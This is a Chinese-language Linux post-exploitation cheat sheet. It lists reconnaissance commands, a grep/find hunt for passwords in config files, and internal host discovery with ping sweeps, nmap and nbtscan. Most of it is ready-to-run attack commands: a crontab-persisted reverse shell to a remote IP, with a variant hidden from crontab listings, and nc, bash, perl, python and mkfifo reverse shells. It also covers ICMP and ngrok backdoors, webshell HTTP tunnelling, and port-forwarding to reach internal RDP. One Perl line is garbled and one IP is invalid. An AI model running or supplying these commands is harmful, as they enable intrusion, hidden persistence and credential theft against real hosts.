Linux主机信息收集
2021年12月22日last 多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像 Ifconfig -a/arp -a/netstat -anopt/ss -nt ifconfig -a 查看内网ip 网卡 网关 route -n 内网路由情况,也能为内网网络拓扑提供一定的信息 IPtables 防火墙情况,有时候会存在内网网络通行规则,也能提供一定信息 history 查看历史执行命令 last/lastlog/lastb 查看登陆记录 netstat -anopt 查看网络链接 iptables --list 查看防火墙规则
敏感文件收集
grep "password:" * -Rn find / -name "config.*" find / -name "databases.*" find / -name "config.*" | xargs grep "password""
查看存活IP
for i in $( seq 1 255);do ping -c 1 192.168.0.$i | grep "ttl" | awk -F "[ :]+" '{print $4}'; done > ip.txt for i in $( seq 1 255);do ping -c 1 192.168.$i.1 | grep "ttl" | awk -F "[ :]+" '{print $4}'; done > ip.txt
#!/bin/bash for ip in 192.168.1.{1..254} do ping $ip -c 1 &> /dev/null if [ $? -eq 0 ];then echo $ip is alive .... fi done 或者 for i in 192.168.4.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done namp的icmp扫描 nmap -sn -PE 192.168.1.0/24 nmap arp 扫描 nmap -sn -PR 192.168.1.0/24 基于smb netbios 内网主机发现 wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz tar -zxvf nbtscan-source-1.0.35.tgz make echo $? ./nbtscan -h ./nbtscan -m 192.168.1.0/24
反弹shell
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/12.12.12.12/4433;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
高级版 无状态链接
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/12.12.12.12/4433;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for whoami%100c\n")|crontab -
详细描述
https://github.com/tom0li/security_circle/blob/master/15288418585142.md
Grok-backdoor
python后门 使用ngrok通信
https://github.com/deepzec/Grok-backdoor
icmpsh
vps git clone https://github.com/inquisb/icmpsh.git apt-get install python-impacket sysctl -w net.ipv4.icmp_echo_ignore_all=1 python icmpsh_m.py 12.12.12.12 127.1.1.207 靶机 icmpsh.exe -t 12.12.12.12 -d 500 -b 30 -s 128 这样就会在vps上链接到一个cmdshell
NC反弹
正向反弹shell 服务器端 nc -lvvp 7777 -e /bin/bash 本地 nc 192.168.242.129 7777 即可获得服务器端的shell 反向链接 服务端 nc -e /bin/bash 192.168.242.1 7777 本地 nc -lvvp 7777 不使用-e参数反弹 使用管道 服务端 mknod /tmp/backpipe p #需要root权限执行 /bin/sh 0</tmp/backpipe | nc 192.168.242.1 7777 1>/tmp/backpipe mkfifo /tmp/backpipe p #没有root权限情况下可以使用该命令 /bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe 攻击端 nc -lnvp 7777 mknod需要root用户,但是也可以通过mkfifo /tmp/backpipe也可以创建一个管道。
Bash反弹
服务端: bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1' 或者 bash -i >& /dev/tcp/192.168.242.1/7777 0>&1 攻击端: nc -lvvp 7777
Perl反弹
服务端: perl -e 'use Socket;$i="192.168.242.1";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.242.1:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'while<>;'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
rm
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 12.12.12.12 1234 >/tmp/f
Http代理
https://github.com/nccgroup/ABPTTS
pip install pycrypto 加密库,整个数据加密都要靠这个 pip install httplib2 python abpttsfactory.py -o web python abpttsclient.py -c webshell\config.txt -u "http://12.12.12.12/abptts.aspx" -f 127.0.0.1:1234/127.0.0.1:3389
linux portmap
监听1234端口,转发数据到2333端口 本地:./portmap -m 2 -p1 1234 -p2 2333 将目标的3389转发到本地的1234端口 ./portmap -m 1 -p1 3389 -h2 ip -p2 1234 iptables 1、编辑配置文件/etc/sysctl.conf的net.ipv4.ip_forward = 1 2、关闭服务 service iptables stop 3、配置规则 需要访问的内网地址:192.168.206.101 内网边界web服务器:192.168.206.129 iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389 iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129 4、保存&&重启服务 service iptables save && service iptables start